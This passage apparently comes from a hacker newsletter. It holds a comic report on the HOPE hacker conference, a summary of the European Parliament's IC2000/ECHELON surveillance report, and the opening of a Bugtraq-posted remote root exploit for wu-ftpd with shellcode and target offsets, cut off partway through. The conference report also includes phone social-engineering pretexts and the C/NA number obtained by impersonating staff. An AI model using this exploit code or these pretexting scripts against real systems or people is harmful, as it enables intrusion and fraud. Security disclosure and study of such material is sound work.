OSS conferences he has successfully juxtaposed hackers and senior KGB officials who needed full time security during their specially arranged 48 hour visa to Washington, DC. He brought Emmanuel and Rop and clan to his show and since their agendas aren't all that different, a camaraderie was formed. Robert MIB Steele believes that the current intelligence machinery is inadequate to meet the challenges of today's world. Over 80% of the classified information contained with the Byzantine bowels of the government is actually available from open sources. We need to realize that the future is more of an open book than ever before. We classify newspaper articles from Peru in the incredibly naive belief that only Pentagon spooks subscribe. We classify BBC video tapes from the UK with the inane belief that no one will watch it if it so stamped. We classify $4 Billion National Reconnaissance Office satellite generated street maps of Calle, Colombia when anyone with an IQ only slightly above a rock can get the same one from the tourist office. And that's where hackers come in. "You guys are a national resource. Too bad everyone's so scared of you." Applause from everywhere. The MIB knows how to massage a crowd. Hackers, according to Steele, and to a certain extent I agree, are the truth tellers "in a constellation of complex systems run amok and on the verge of catastrophic collapse." Hackers are the greatest sources of open source information in the world. They have the navigation skills, they have the time, and they have the motivation, Robert says. Hackers peruse the edges of technology and there is little that will stop them in their efforts. The intelligence community should take advantage of the skills and lessons that the hackers have to teach us, yet as we all know, political and social oppositions keep both sides (who are really more similar then dissimilar) from talking. "Hackers put a mirror up to the technical designers who have built the networks, and what they see, they don't like. Hackers have shown us all the chinks in the armor of a house without doors or windows. The information infrastructure is fragile and we had better do something about it now; before it's too late." Beat them at their own game, suggests Steele. Keep the doors of Cyberspace open, and sooner or later, the denizens of the black holes of information will have to sooner or late realize that the cat is out of the bag. Steele educated the Hacker crowd in a way new to them: he treated them with respect, and in turn he opened a channel of dialog that few above ground suit-types have ever envisioned. Steele works at the source. HOPE had begun and Robert had set the tone. * * * * * The day was long. Dogged by press, hackers rolled over so the reporters could tickle their stomachs on camera. Despite their public allegations that the media screws it up and never can get the story right, a camera is like a magnet. The New York Times printed an article about HOPE so off the wall I wondered if the reporter had actually been there. Nonetheless, the crowds followed the cameras, the cameras followed the crowds, and the crowds parted like the Red Sea. But these were mighty colorful crowds. We all hear of that prototypical image of the acne faced, Jolt- drinking, pepperoni downing nerdish teenager who has himself locked in the un-air-conditioned attic of his parents' half million dollar house from the time school gets out till the sun rises. Wrongo security-breath. Yeah, there's that component, but I was reminded of the '80's, the early '80's by a large percent- age of the crowd. Purple hair was present but scarce, and I swear on a stack of 2600's that Pat from Saturday Night Live was there putting everyone's hormonal guess-machines to the test. But what cannot help but capture one's attention is a 40 pin integrated circuit inserted into the shaved side skull of an otherwise clean-cut Mohawk haircut. The story goes that Chip Head went to a doctor and had a pair of small incisions placed in his skull which would hold the leads from the chip. A little dab of glue and in a few days the skin would grow back to hold the 40 pins in the natural way; God's way. There was a time that I thought ponytails were 'out' and passe, but I thought wrong. Mine got chopped off in roughly 1976 down to shoulder length which remained for another six years, but half of the HOPE audience is the reason for wide spread poverty in the hair salon industry. Nothing wrong with long, styled, inventive, outrageous hair as long as it's clean; and with barely an exception, such was the case. In New York it's not too hard to be perceived as clean, especially when you consider the frame of reference. Nothing is too weird. The energy level of HOPE was much higher than the almost lethargic (but good!) DefCon II. People move in a great hurry, perhaps to convey the sense of importance to others, or just out of frenetic hyperactivity. Hackers hunched over their keyboards - yet with a sense of urgency and purpose. Quiet yet highly animated conversations in all corners. HOPE staff endlessly pacing throughout the event with their walkie-talkies glued to their ears. Not many suit types. A handful at best, and what about the Feds? I was accosted a few times for being a Fed, but word spread: no Fed, no bust. Where were the Feds? In the lobby. The typical NYPD cop has the distinctive reputation of being overweight especially when he wearing two holsters - one for the gun and one for the Italian sausage. Perpetually portrayed as donut dunking dodo's, some New York cops' asses are referred to as the Fourth Precinct and a few actually moonlight as sofas. So rather than make a stink, (NY cops hate to make a scene) the lobby of the Hotel Filthadelphia was home to the Coffee Clutch for Cops. About a half dozen of them made their profound presence known by merely spending their day consuming mass quantities of questionable ingestibles, but that was infinitely preferable to hanging out on the 18th floor. The hackers weren't causing any trouble, the cops knew that, so why push it. Hackers don't fight, they hack. Right? After hours of running hours behind schedule, the HOPE conference was in first place for disorganized, with DefCon II not far behind. Only with 1000 people to keep happy and in the right rooms, chaos reigns sooner. The free Unix sessions and Pager session and open microphone bitch session and the unadulterated true history of 2600 kept audiences of several hundred hankering for more - hour after hour. Over by the cellular hacking demonstrations, I ran into a hacker I had written about: Julio, from the almost defunct Masters of Destruction. Julio had gone state's evidence and was prepared to testify against MoD ring leader Mark Abene (aka Phiber Optik) but once Mark pled guilty to enough crimes to satisfy the Feds, Julio was off the hook with mere probation. Good guy, sworn off of hacking. Cell phones are so much more interesting. However, while standing around with Erikb and a gaggle of Cyber Christ wanna-bes, Julio and his friend (who was the size of Texas on two legs) began a pushing match with Goggans. "You fucking narc red-neck son of a bitch." Goggans helped build the case against the MoD and didn't make a lot of friends in the process. The shoving and shouldering reminded me of slam dancing from decades past, but these kids are too young to have taken part in the social niceties of deranged high speed propulsion and revulsion on the dance floor. So it was a straight out pushing match, which found Erikb doing his bloody best to avoid. Julio and pal kept a'coming and Erikb kept avoiding. It took a dozen of us to get in the middle and see that Julio was escorted to the elevators. Julio said Corrupt, also of the MoD, was coming down to HOPE, too. Corrupt has been accused of mugging drug dealers to finance his computer escapades, and was busted along with the rest of the MoD gang. The implied threat was taken seriously, but, for whatever reason, Corrupt never showed. It is said that the majority of the hacking community distances itself from him; he's not good for the collective reputation. So much for hacker fights. All is calm. The evening sessions continued and continued with estimates of as late as 4AM being bandied about. Somewhere around 1:00AM I ran into Bootleg in the downstairs bar. Where was everybody? Not upstairs. Not in the bar. I saw a Garbage Heap in the street outside (now that's a double entendre) and then Goggans popped up from the door of the Blarney Stone, a syndicated chain of low- class Irish bars that serve fabulously thick hot sandwiches. "We're about to get thrown out." "From the Blarney Stone? That's impossible. Drunks call the phone booths home!" Fifty or so hacker/phreaks had migrated to the least likely, most anachronistic location one could imagine. A handful of drunken sots leaning over their beers on a stain encrusted wooden breeding ground for salmonella. A men's room that hasn't seen the fuzzy end of a brush for the best part of a century made Turkish toilets appear refreshingly clean. And they serve food here. I didn't look like a hacker so I asked the bartender, "Big crowd, eh?" The barrel chested beer bellied barman nonchalantly replied, "nah. Pretty usual." He cleaned a glass so thoroughly the water marks stood out plainly. "Really? This much action on a Saturday night on a dark side street so questionably safe that Manhattan's Mugger Society posts warnings?" "Yup." "So," I continued. "These hackers come here a lot?" "Sure do," he said emphatically. "Wow. I didn't know that. So this is sort of a hacker bar, you might say?" "Exactly. Every Saturday night they come in and raise a little hell." With a straight face I somehow managed to thank the confused barman for his help and for the next four hours learned that socially, hackers of today are no different than many if not most of us were in our late teens ad early twenties. We laughed and joked and so do they - but there is more computer talk. We decried the political status of our day as they do theirs, albeit they with less fervor and more resignation. The X-Generation factor: most of them give little more than a tiny shit about things they view as being totally outside their control, so why bother. Live for today. Know they enemy. Robert hung in with me intermingling and arguing and debating and learning from them, and they from us. Hackers aren't the enemy - their knowledge is - and they are not the exclusive holders of that information. Information Warfare is about capabilities, and no matter who possesses that capability, there ought to be a corresponding amount respect. Indeed, rather than adversaries, hackers could well become government allies and national security assets in an intense international cyber-conflict. In the LoD/MoD War of 1990-91, one group of hackers did help authorities. Today many hackers assist professional organizations, governments in the US and overseas - although very quietly. 'Can't be seen consorting with the enemy.' Is hacking from an Army or Navy or NATO base illegal? Damned if I know, but more than one Cyber Christ-like character makes a tidy sum providing hands-on hacking education to the brass in Europe. Where these guys went after 5AM I don't know, but I was one of the first to be back at the HOPE conference later that day; 12:30 PM Sunday. * * * * * The Nazi Hunters were out in force. "The Neo-Nazi skinheads are trying to start another Holocaust." A piercing, almost annoying voice stabbed right through the crowds. "Their racist propaganda advocates killing Jews and blacks. They have to be stopped, now." Mortechai Levy (I'll call him Morty) commanded the attention of a couple dozen hackers. Morty was a good, emotional, riveting shouter. "These cowardly bastards have set up vicious hate call lines in over 50 cities. The messages advocate burning synagogues, killing minorities and other violence. These phones have to be stopped!" The ever-present leaflet from Morty's Jewish Defense Organization asked for help from the 2600 population. "Phone freaks you must use your various assorted bag of tricks to shut these lines down. No cowardly sputterings about 'free speech' for these fascist scum." The headline invited the hacker/phreak community to: "Let's Shut Down 'Dial-A-Nazi'!!!" Morty was looking for political and technical support from a band of nowhere men and women who largely don't know where they're going much less care about an organized political response to someone elses cause. He wasn't making a lot of headway, and he must have know that he would walk right into the anarchist's bible: the 1st amendment. The battle lines had been set. Morty wanted to see the Nazis censored and hackers are absolute freedom of speechers by any measure. Even Ben sauntering over for a group hug did little to defuse the mounting tension. I couldn't help but play mediator. Morty was belligerently loud and being deafeningly intrusive which affected the on-going sessions. To tone it down some, we nudged Morty and company off to the side and occupied a corner of thread bare carpet, leaning against a boorish beige wall that had lost its better epidermis. The heated freedom of speech versus the promotion of racial genocide rancor subdued little even though we were all buns side down. I tried to get a little control of the situation. "Morty. Answer me this so we know where you're coming from. You advocate the silencing of the Nazis, right? "They're planning a new race war; they have to be stopped." "So you want them silenced. You say their phones should be stopped and that the hackers should help." "Call that number and they'll tell you that Jews and blacks should be killed and then they . . ." "Morty. OK, you want to censor the Nazis. Yes or No." "Yes." "OK, I can understand that. The question really is, and I need your help here, what is the line of censorship that you advocate. Where is your line of legal versus censored?" A few more minutes of political diatribe and then he got to the point. "Any group with a history of violence should be censored and stopped." A little imagination and suddenly the whole planet is silenced. We need a better line, please. "Hate group, Nazis, people who advocate genocide . . . they should be silenced . . . ." "So," I analyzed. "You want to establish censorship criteria based upon subjective interpretation. Whose interpretation?" My approach brought nods of approval. One has to admire Morty and his sheer audacity and tenacity and how much he strenuously and single-mindedly drives his points home. He didn't have the ideal sympathetic audience, but he wouldn't give an inch. Not an inch. A little self righteousness goes a long way; boisterous extremism grows stale. It invites punitive retorts and teasing, or in counter-culture jargon, "fucking with their heads." Morty (perhaps for justifiable reasons) was totally inflexible and thus more prone to verbal barbing. "You're just a Jewish racist. Racism in reverse," accused one jocular but definitely lower middle class hacker with an accent thicker than all of Brooklyn. Incoming Scuds! Look out! Morty went nuts and as they say, freedom of speech ends when my fists impacts upon your nose. Morty came dangerously close to crossing that line. Whoah, Morty, whoah. He's just fucking with your head. The calm-down brigade did its level best to keep these two mortals at opposite ends of the room. "You support that Neo Nazi down there; you're as bad as the rest!" Morty said. "See what I have to tolerate. I know him, we've been keeping track of him and he hangs out with the son of the Grand Wizard of Nazi Oz." The paranoid train got on the tracks. "Do you really know the Big Poo-bah of Hate?" I asked the hacker under assault and now under protective custody. "Yeah," he said candidly. "He's some dick head who hates everyone. Real jerk." "So what about you said to Morty over there?" "Just fucking with his head. He gets a little extreme." So we had in our midst the Al Sharpton of the Jewish faith. Ballsy. Since Morty takes Saturday's off by religious law, he missed the press cavalcade, but as a radical New York fixture, the media probably didn't mind too much. I was off to sessions, Morty found new audiences as they came off the elevators, and the band played on. * * * * * In my humble 40-something opinion, the best session of HOPE was the one on social engineering. The panel consisted of only Emmanuel, Supernigger (social engineer par excellence) and Cheshire Catalyst. The first bits were pretty staid dry conventional conference (ConCon) oriented, but nonetheless, not the kind of info that you expect to find William H. Murray, Executive Consultant handing out. The best social engineers make friends of their victims. Remember: you're playing a role. Think Remington Steele. Schmooze! "Hey, Jack did you get a load of the blond on Stern last night?" Justifiable anger: "Your department has caused nothing but headaches. These damn new computers/phones/technology just don't work like the old ones. Now either you help me now or I'm going all the way to Shellhorn and we'll what he says about these kinds of screwups." A contrite response is the desired effect. Butt headed bosses: "Hey, my boss is all over my butt, can you help me out?" Management hatred: "I'm sitting here at 3PM working while management is on their yachts. Can you tell me . . .?" Giveaways: "Did you know that so and so is having an affair with so and so? It's true, I swear. By the way, can you tell me how to . . ." Empathy: "I'm new, haven't been to the training course and they expect me to figure this out all by myself. It's not fair." Thick Accent: "Hi. Dees computes haf big no wurk. Eet no makedah passurt. Cunu help? Ah, tanku." Good for a quick exchange and a quick good-bye. Carefully done, people want you off the phone quickly. Billsf, the almost 40 American phreak who now calls Amsterdam home was wiring up Supernigger's real live demonstration of social engineering against Sprint. A dial tone came over the PA system followed by the pulses to 411. "Directory Assistance," the operator's male voice was squeezed into a mere three kilohertz bandwidth. Suddenly, to the immense pleasure of the audience, an ear-splitting screech a thousand times louder than finger nails on a chalk board not only belched across the sound system but caused instant bleeding in the ears of the innocent but now deaf operator. . Billsf sheepishly grinned. "Just trying to wire up a mute button." Three hundred people in unison responded: "It doesn't work." No shit. While Billsf feverishly worked to regain his reputation, Supernigger explained what he was going to do. The phone companies have a service, ostensibly for internal use, called a C/NA. Sort of a reverse directory when you have the number but want to know who the number belongs to and from whence it comes. You can understand that this is not the sort of feature that the phone company wants to have in the hands of a generation of kids who are so apathetic that they don't even know they don't give a shit. Nonetheless, the access to this capability is through an 800 number and a PIN. Supernigger was going to show us how to acquire such privileged information. Live. "When you get some phone company person as dumb as a bolt on the other end, and you know a few buzz words. you convince them that it is in their best interest and that they are supposed to give you the information." "I've never done this in front of an audience before, so give me three tries," he explained to an anxiously foaming at the mouth crowd. No one took a cheap pot shot at him: tacit acceptance of his rules. Ring. Ring. "Operations. Mary." "Mary. Hi, this is Don Brewer in social engineering over at CIS, how's it going?" Defuse. "Oh, fine. I guess." "I know, I hate working Sundays. Been busy?" "Nah, no more. Pretty calm. How can I help you?" "I'm doing a verification and I got systems down. I just need the C/NA. You got it handy?" Long pause. "Sure, lemme look. Ah, it's 313.424.0900." 700 notebooks appeared out of nowhere, accompanied by the sound of 700 pens writing down a now-public phone number. "Got it. Thanks." The audience is gasping at the stunningly stupid gullibility of Mary. But quiet was essential to the mission. "Here's the PIN number while we're at it." Double gasp. She's offering the supposedly super secret and secure PIN number? Was this event legal? Had Supernigger gone over the line? "No, CIS just came up. Thanks anyway." "Sure you don't need it?" "Yeah. Thanks. Bye." Click. No need to press the issue. PIN access might be worth a close look from the next computer DA wanna-be. An instant shock wave of cacophonous approval worked its way throughout the 750 seat ballroom in less than 2 microseconds. Supernigger had just successfully set himself as a publicly ordained Cyber Christ of Social Engineering. His white robes were on the way. Almost a standing ovation lasted for the better part of a minute by everyone but the narcs in the audience. I don't know if they were telco or Feds of whatever, but I do know that they were the stupidest narcs in the city of New York. This pair of dour thirty something Republicans had sphincters so tight you could mine diamonds out of their ass. Arms defiantly and defensively crossed, they were stupid enough to sit in the third row center aisle. They never cracked a smile at some of the most entertaining performances I have seen outside of the giant sucking sound that emanates from Ross Perot's ears. Agree or disagree with hacking and phreaking, this was funny and unrehearsed ad lib material. Fools. So, for fun, I crawled over the legs of the front row and sat in the aisle, a bare eight feet from the narcs. Camera in hand I extended the 3000mm tele-photo lens which can distinguish the color of a mosquitoes underwear from a kilometer and pointed it in their exact direction. Their childhood acne scars appeared the depth of the Marianna Trench. Click, and the flash went off into their eyes, which at such a short distance should have caused instant blindness. But nothing. No reaction. Nada. Cold as ice. Rather disappointing, but now we know that almost human looking narc-bots have been perfected and are being beta tested at hacker cons. Emmanuel Goldstein is very funny. Maybe that's why Ed Markey and he get along so well. His low key voice rings of a gentler, kinder sarcasm but has a youthful charm despite that he is 30- something himself. "Sometimes you have to call back. Sometimes you have to call over and over to get what you want. You have to keep in mind that the people at the other end of the phone are generally not as intelligent as a powered down computer." He proceeded to prove the point. Ring ring, "Directory Assistance." "Hi." "Hi." "Hi." "Can I help you." "Yes." Pause. "Hello?" "Hi." "Hi." "Can I help you.: "OK." Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words. "Directory Assistance." "I need some information." "How can I help you." "Is this where I get numbers?" "What number would you like?" "Information." "This is information." "You said directory assistance." "This is." "But I need information." "What information do you need?" "For information." "This is information." "What's the number?" "For what?" "Information." "This is directory assistance." "I need the number for information." Pause. Pause. "What number do you want?" "For information." Pause. Guffaws, some stifled, some less so. Funny stuff. "Hold on please." Pause. "Supervisor. May I help you?" "Hi." "Hi." Pause. "Can I help you?" "I need the number for information." "This is directory assistance." "Hi." "Hi." "What's the number for information?" "This is information." "What about directory assistance?" "This is directory assistance." "But I need information." "This is information." "Oh, OK. What's the number for information?" Pause. "Ah 411." "That's it?" "No. 555.1212 works too." "So there's two numbers for information?" "Yes." "Which one is better?" How this audience kept its cool was beyond me. Me and my compatriots were beside ourselves. Pause. "Neither." "Then why are there two?" Pause. "I don't know." "OK. So I can use 411 or 555.1212." "That's right." "And which one should I use?" Pause. "411 is faster." Huge guffaws. Ssshhhh. Ssshhhh.. "Oh. What about the ones?" "Ones?" "The ones." "Which ones?" "The ones at the front of the number." "Oh, those ones. You don't need ones. Just 411 or 555.1212.." "My friends say they get to use ones." Big laugh. Shhhhhh. "That's only for long distance." "To where?" How does he keep a straight face? Pause. "If you wanted 914 information you'd use a one." "If I wanted to go where?" "To 914?" "Where's that?" "Westchester." "Oh, Westchester. I have friends there." Pause. "Hello?" "Yes?" "So I use ones?" "Yes. A one for the 914 area." "How?" Pause. "Put a one before the number." "Like 1914. Right?" "1914.555.1212." "All of those numbers?" "Yes." "That's three ones." "That's the area code." "I've heard about those. They confuse me." Rumbling chuckles and laughs throughout the hall. Pause. She slowly and carefully explained what an area code is to the howlingly irreverent amusement of the entire crowd except for the fool narcs. "Thanks. So I can call information and get a number?" "That's right." "And there's two numbers I can use?" "Yes." "So I got two numbers on one call?" "Yeah . . ." "Wow. Thanks. Have a nice day." * * * * * Comments heard around HOPE. Rop Gongrijjp, Hacktic: "The local phone companies use their own social engineers when they can't get their own people to tell them what they need to know." Sprint is using what they consider to be the greatest access mechanism since the guillotine. For all of us road warriors out there who are forever needing long distance voice service from the Whattownisthis, USA airport, Sprint thinks they have a better mousetrap. No more messing finger entry. No more pass-codes or PIN's. I remember at the Washington National Airport last summer I was using my Cable and Wireless long distance access card and entered the PIN and to my surprise, an automated voice came on and said, "Sorry, you entered your PIN with the wrong finger. Please try again." Sprint says they've solved this thorny cumbersome problem with a service called "The Voice Fone Card". Instead of memorizing another 64 digit long PIN, you just speak into the phone: "Hi, it's me. Give me dial tone or give me death." The voice recognition circuits masturbate for a while to determine if it's really you or not. Good idea. But according to Strat, not a good execution. Strat found that someone performing a poor imitation of his voice was enough to break through the front door with ease. Even a poor tape recording played back over a cheap cassette speaker was sufficient to get through Sprint's new whiz-banger ID system. Strat laughed that Sprint officials said in defense, "We didn't say it was secure: just convenient." Smart. Oh, so smart. * * * * * "If my generation of the late 60's and early 70's had had the same technology you guys have there never would have been an 80's." This was how I opened my portion of the author's panel. The authors panel was meant to give HOPE hackers insight into how they are perceived from the so-called outside. I think the session achieved that well, and I understand the videos will be available soon. The question of electronic transvestites on AOL came up to everyone's enjoyment, and all of us on the panel retorted with a big, "So what?" If you have cyber-sex with someone on the 'Net and enjoy it, what the hell's the difference? Uncomfortable butt shifting on chairs echoed how the largely male audience likely feels about male-male sex regardless of distance. "Imagine," I kinda said, "that is a few years you have a body suit which not only can duplicate your moves exactly, but can touch you in surprisingly private ways when your suit is connected to another. In this VR world, you select the gorgeous woman of choice to virtually occupy the other suit, and then the two of you go for it. How do you react when you discover that like Lola, 'I know what I am, and what I am is a man and so's Lola.'" Muted acknowledgment that unisex may come to mean something entirely different in the not too distant future. "Ooh, ooh, please call on me." I don't mean to be insulting, but purely for identification purposes, the woman behind the voice bordered on five foot four and four hundred pounds. Her bathtub had stretch marks. I never called on her but that didn't stop her. "I want to know what you think of how the democratization of the internet is affected by the differences between the government and the people who think that freedom of the net is the most important thing and that government is fucked but for freedom to be free you have to have the democracy behind you which means that the people and the government need to, I mean, you know, and get along but the sub culture of the hackers doesn't help the government but hackers are doing their thing which means that the democracy will not work , now I know that people are laughing and giggling (which they were in waves) but I'm serious about this and I know that I have a bad case of hypomania but the medication is working so it's not a bad as it could be. What do you think?" I leaned forward into the microphone and gave the only possible answer. "I dunno. Next." The thunderous round of applause which followed my in-depth response certainly suggested that my answer was correct. Not politically, not technically, but anarchistically. Flexibility counts. * * * * * HOPE was attended by around one thousands folks, and the Hotel Filthadelphia still stands. (Aw shucks.) My single biggest complaint was not that the schedules slipped by an hour or two or three; sessions at conferences like this keep going if the audience is into them and they are found to be educational and productive. So an hour session can run into two if the material and presentations fit the mood. In theory a boring session could find itself kama kazi'd into early melt-down if you have the monotone bean counter from hell explaining the distributed statistical means of aggregate synthetic transverse digitization in composite analogous integral fruminations. (Yeah, this audience would buy off on that in a hot minute.) But there were not any bad sessions. The single track plenary style attracted hundred of hackers for every event. Emmanuel and friends picked their panels and speakers well. When dealing with sponge-like minds who want to soak up all they can learn, even in somewhat of a party atmosphere, the response is bound to be good. My single biggest complaint was the registration nightmare. I'd rather go the DMV and stand in line there than get tagged by the seemingly infinite lines at HOPE. At DefCon early registration was encouraged and the sign up verification kept simple. For some reason I cannot thoroughly (or even partially) fathom, a two step procedure was chosen. Upon entering, and before the door narcs would let anyone in, each attendee had to be assigned a piece of red cardboard with a number on it. For the first day you could enter the 'exhibits' and auditorium without challenge. But by Day 2 one was expected to wait in line for the better part of a week, have a digital picture taken on a computer tied to a CCD camera, and then receive a legitimate HOPE photo-ID card. What a mess. I don't have to beat them up on it too bad; they know the whole scheme was rotten to the core. I waited till near the end of Day 2 when the lines were gone and the show was over. That's when I got my Photo ID card. I used the MIB's photo ID card the rest of the time. HOPE was a lot of fun and I was sorry to see it end, but as all experiences, there is a certain amount of letdown. After a great vacation, or summer camp, or a cruise, or maybe even after Woodstock, a tear welts up. Now I didn't cry that HOPE was over, but an intense 48 hours with hackers is definitely not your average computer security convention that only rolls from 9AM to Happy Hour. At a hacker conference, you snooze, you lose. You never know what is going to happen next - so much is spontaneous and unplanned - and it generally is highly educational, informative and entertaining. Computer security folks: you missed an event worth attending. You missed some very funny entertainment. You missed some fine young people dressed in some fine garb. You missed the chance to meet with your perceived 'enemy'. You missed the opportunity to get inside the heads of the generation that knows more about keyboards than Huck Finning in suburbia. You really missed something, and you should join Robert MIB Steele and I at the next hacker conference. * * * * * If only I had known. If only I had known that tornadoes had been dancing up and down 5th avenue I would have stayed at the Hotel Filthadelphia for another night. La Guardia airport was closed. Flights were up to 6 hours delayed if not out and out canceled. Thousands of stranded travelers hunkered down for the night. If only I had known. Wait, wait. Hours to wait. And then, finally, a plane ready and willing to take off and swerve and dive between thunderbolts and twisters and set me on my way home. My kids were bouncing out of the car windows when my wife picked me up at the airport somewhere in the vicinity of 1AM. "Not too late are you dear?" Sweet Southern Sarcasm from my Sweet Southern Wife. "Don't blame me," I said in all seriousness. "It was the hackers. They caused the whole thing." * * * * * Notice: This article is free, and the author encourages responsible widespread electronic distribution of the document in full, not piecemeal. No fees may be charged for its use. For hard copy print rights, please contact the author and I'll make you an offer you can't refuse. The author retains full copyrights to the contents and the term Cyber-Christ. Winn is the author of "Terminal Compromise", a novel detailing a fictionalized account of a computer war waged on the United States. After selling well as a book-store-book, Terminal Compromise was placed on the Global Network as the world's first Novel-on-the-Net Shareware and has become an underground classic. (Gopher TERMCOMP.ZIP) His new non-fiction book, "Information Warfare: Chaos on the Electronic Superhighway" is a compelling, non-technical analysis of personal privacy, economic and industrial espionage and national security. He calls for the creation of a National Information Policy, a Constitution in Cyberspace and an Electronic Bill of Rights. He may be reached at INTER.PACT, 11511 Pine St., Seminole, FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail: P00506@psilink.com. # # # @HWA 42.0 IC2000, Interception Capabilities 2000 and ECHELON ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 7 May 1999. Thanks to Anonymous. http://jya.com/crypto.htm http://jya.com/ic2000-dc.htm 7 May 1999 Interception Capabilities 2000 ("IC2000") The IC2000 report on communications interception and ECHELON was approved as a working document by the Science and Technology Options Assessment Panel of the European Parliament (STOA) at their meeting in Strasbourg on 6 May 1999. Key findings of the IC2000 report � Comprehensive systems exist to access, intercept and process every important modern form of communications, with few exceptions (section 2, technical annexe); � The report provides original new documentary and other evidence about the ECHELON system and its role in the interception of communication satellites (section 3). In excess of 120 satellite based systems are currently in simultaneous operation collecting intelligence (section 2). Submarines are routinely used to access and intercept undersea communications systems. � There is wide-ranging evidence indicating that major governments are routinely utilising communications intelligence to provide commercial advantage to companies and trade. � Although "word spotting" search systems to automatically select telephone calls of intelligence interest are not thought to be effective, speaker recognition systems in effect, "voiceprints" have been developed and are deployed to recognise the speech of targeted individuals making international telephone calls; � Recent diplomatic initiatives by the United States government seeking European agreement to the "key escrow" system of cryptography masked intelligence collection requirements, forming part of a long-term program which has undermined and continues to undermine the communications privacy European companies and citizens; � Interception for legally authorised domestic interception and interception for clandestine intelligence purposes must be sharply distinguished. A clear boundary between law enforcement and "national security" interception activity is essential to the protection of human rights and fundamental freedoms. � Providing the measures called for in the 1998 Parliamentary resolution on "Transatlantic relations/ECHELON measures may be facilitated by developing an in-depth understanding of present and future Comint capabilities. Protective measures may best be focused on defeating hostile Comint activity by denying access or, where this is impractical or impossible, preventing processing of message content and associated traffic information by general use of cryptography. � In relation to the manner in which Internet browsers and other software is deliberately weakened for use by other than US citizens, consideration could be given to a countermeasure whereby, if systems with disabled cryptographic systems are sold outside the United States, they should be required to conform to an "open standard" such that third parties and other nations may provide additional applications which restore the level of security to at least that enjoyed by domestic US customers. � It should be possible to define and enforce a shared interest in implementing measures to defeat future external Sigint activities directed against European states, citizens and commercial activities. The full report with all images: http://jya.com/ic2000.zip [918K] A text-only version (with selected images): http://jya.com/ic2000-text.htm (356K) Text-only Zipped: http://jya.com/ic2000-text.zip (189K) Source: http://www.europarl.eu.int/dg4/stoa/en/news/1999/apr99.htm#workdocs STOA Newsletter April 1999 Strasbourg, 14 April 1999 PE 167.871 [Excerpt] WORKING DOCUMENTS, STUDIES, PAPERS, BRIEFS Work in Progress - The following Working documents are being presented to the STOA Panel in April: Workplan 1998 ... Development of surveillance technology and risk of abuse of economic information (Appraisal of technologies of political control) (1)The legality of the interception of electronic communications: A concise survey of the principal legal issues and instruments under international, European and national law, by Chris ELLIOTT, Surrey, UK Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April 1999, PE 168.184/part 2/4 (2)Encryption and cryptosystems in electronic surveillance: A survey of the technology assessment issues, by Franck LEPR�VOST, Technische Universit�t Berlin, Germany Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April 1999, PE 168.184/part 3/4 (3)The state of the art in Communications Intelligence (COMINT) of automated processing for intelligence purposes of intercepted broadband multi-language leased or common carrier systems, and its applicability to COMINT targeting and selection, including speech recognition, by Duncan CAMPBELL, IPTV Ltd., Edinburgh, UK Final Study, Working document for the STOA Panel, Workplan 1998 - 98/14/01, EN, April 1999, PE 168.184/part 4/4 [No information on part 1/4] @HWA 43.0 WuFTPd exploit w00f.c ~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 1 May 1999 21:59:50 +0200 Reply-To: Mixter Sender: Bugtraq List From: Mixter Subject: wuftp2.4.2academ beta 12-18 exploit To: BUGTRAQ@netspace.org this works on a lot of wu-ftpd`s also uses other commands than MKD to exploit realpath() overflow /* * Remote/local exploit for wu-ftpd [12] through [18] * gcc w00f.c -o w00f -Wall -O2 * * Offsets/padding may need to be changed, depending on remote daemon * compilation options. Try offsets -5000 to 5000 in increments of 100. * * Note: you need to use -t >0 for -any- version lower than 18. * Coded by smiler and cossack */ #include #include #include #include #include #include #include #include #include #include #include /* In a beta[12-17] shellcode_A overflow, we will not see responses to our commands. Add option -c (use chroot code) to fix this. */ unsigned char hellcode_a[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20" "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c" "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd" "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff" "\x0f\x42\x49\x4e\x0f\x53\x48"; unsigned char hellcode_b[]= "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */ "\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80" "\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46" "\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e" "\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31" "\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03" "\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89" "\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d" "\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80" "\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31" "\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a"; char *Fgets(char *s,int size,FILE *stream); int ftp_command(char *buf,int success,FILE *out,char *fmt,...); int double_up(unsigned long blah,char *doh); int resolv(char *hostname,struct in_addr *addr); void fatal(char *string); int usage(char *program); int tcp_connect(struct in_addr host,unsigned short port); int parse_pwd(char *in,int *pwdlen); void RunShell(int thesock); struct type { unsigned long ret_address; unsigned char align; /* Use this only to offset \xff's used */ signed short pad_shift; /* how little/much padding */ unsigned char overflow_type; /* whether you have to DELE */ char *name; }; /* ret_pos is the same for all types of overflows, you only have to change the padding. This makes it neater, and gives the shellcode plenty of room for nops etc */ #define RET_POS 190 #define FTPROOT "/home/ftp" /* the redhat 5.0 exploit doesn't work at the moment...it must be some trite error i am overlooking. (the shellcode exits w/ code 0375) */ struct type types[]={ { 0xbffff340, 3, 60, 0, "BETA-18 (redhat 5.2)", }, { 0xbfffe30e, 3,-28, 1, "BETA-16 (redhat 5.1)", }, { 